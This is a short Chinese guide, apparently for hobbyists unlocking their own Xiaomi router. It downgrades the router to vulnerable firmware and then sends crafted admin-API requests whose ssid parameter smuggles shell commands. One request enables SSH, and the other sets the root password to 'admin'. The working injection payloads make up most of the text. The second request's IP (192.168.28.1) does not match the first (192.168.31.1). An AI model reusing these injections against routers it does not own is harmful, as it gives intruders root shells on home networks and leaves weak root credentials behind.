系统降级
- 更换至漏洞官方固件版本
- 下载降级版本
- 更换固件,在小米路由器管理后台选择下载的版本文件更新版本
开启 SSH
获取 sock
登录小米路由器后台会看到地址为,记住 sock
http://192.168.31.1/cgi-bin/luci/;stok=%3CSTOK%3E/web/home#router
漏洞注入
注意 sock 替换成 第一步记住的 sock
http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
更改 root 密码
http://192.168.28.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B